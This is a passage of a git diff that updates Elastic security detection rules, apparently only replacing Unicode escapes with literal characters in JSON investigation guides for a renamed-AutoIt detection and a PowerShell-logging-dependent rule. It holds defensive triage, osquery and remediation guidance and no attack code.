Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Renamed AutoIt Scripts Interpreter\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nAutoIt is a scripting language and tool for automating tasks on Microsoft Windows operating systems. Due to its capabilities, malicious threat actors can abuse it to create malicious scripts and distribute malware.\n\nThis rule checks for renamed instances of AutoIt, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name : \"AutoIt*.exe\" and not process.name : \"AutoIt*.exe\"\n", "related_integrations": [ { @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "2e1e835d-01e5-48ca-b9fc-7a61f7f11902", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_107.json b/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_107.json index d7b592a80aa..79714cfd838 100644 --- a/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_107.json +++ b/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_107.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Renamed AutoIt Scripts Interpreter", - "note": "## Triage and analysis\n\n### Investigating Renamed AutoIt Scripts Interpreter\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nAutoIt is a scripting language and tool for automating tasks on Microsoft Windows operating systems. Due to its capabilities, malicious threat actors can abuse it to create malicious scripts and distribute malware.\n\nThis rule checks for renamed instances of AutoIt, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Renamed AutoIt Scripts Interpreter\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nAutoIt is a scripting language and tool for automating tasks on Microsoft Windows operating systems. Due to its capabilities, malicious threat actors can abuse it to create malicious scripts and distribute malware.\n\nThis rule checks for renamed instances of AutoIt, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name : \"AutoIt*.exe\" and not process.name : \"AutoIt*.exe\"\n", "related_integrations": [ { @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "2e1e835d-01e5-48ca-b9fc-7a61f7f11902", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_108.json b/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_108.json index 9615d43077a..abdebe69dfb 100644 --- a/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_108.json +++ b/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_108.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Renamed AutoIt Scripts Interpreter", - "note": "## Triage and analysis\n\n### Investigating Renamed AutoIt Scripts Interpreter\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nAutoIt is a scripting language and tool for automating tasks on Microsoft Windows operating systems. Due to its capabilities, malicious threat actors can abuse it to create malicious scripts and distribute malware.\n\nThis rule checks for renamed instances of AutoIt, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Renamed AutoIt Scripts Interpreter\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nAutoIt is a scripting language and tool for automating tasks on Microsoft Windows operating systems. Due to its capabilities, malicious threat actors can abuse it to create malicious scripts and distribute malware.\n\nThis rule checks for renamed instances of AutoIt, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name : \"AutoIt*.exe\" and not process.name : \"AutoIt*.exe\"\n", "related_integrations": [ { @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "2e1e835d-01e5-48ca-b9fc-7a61f7f11902", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_105.json b/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_105.json index d9c0c3ce599..9696ff6a2be 100644 --- a/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_105.json +++ b/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_105.json @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "2e29e96a-b67c-455a-afe4-de6183431d0d", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_106.json b/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_106.json index 4a9c13ee11d..7990d042625 100644 --- a/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_106.json +++ b/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_106.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "2e29e96a-b67c-455a-afe4-de6183431d0d", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_107.json b/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_107.json index 4aa2642826c..745408c94b4 100644 --- a/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_107.json +++ b/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_107.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "2e29e96a-b67c-455a-afe4-de6183431d0d", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_108.json b/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_108.json index 135e3dd4144..ccea9024e4f 100644 --- a/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_108.json +++ b/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_108.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "2e29e96a-b67c-455a-afe4-de6183431d0d", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ 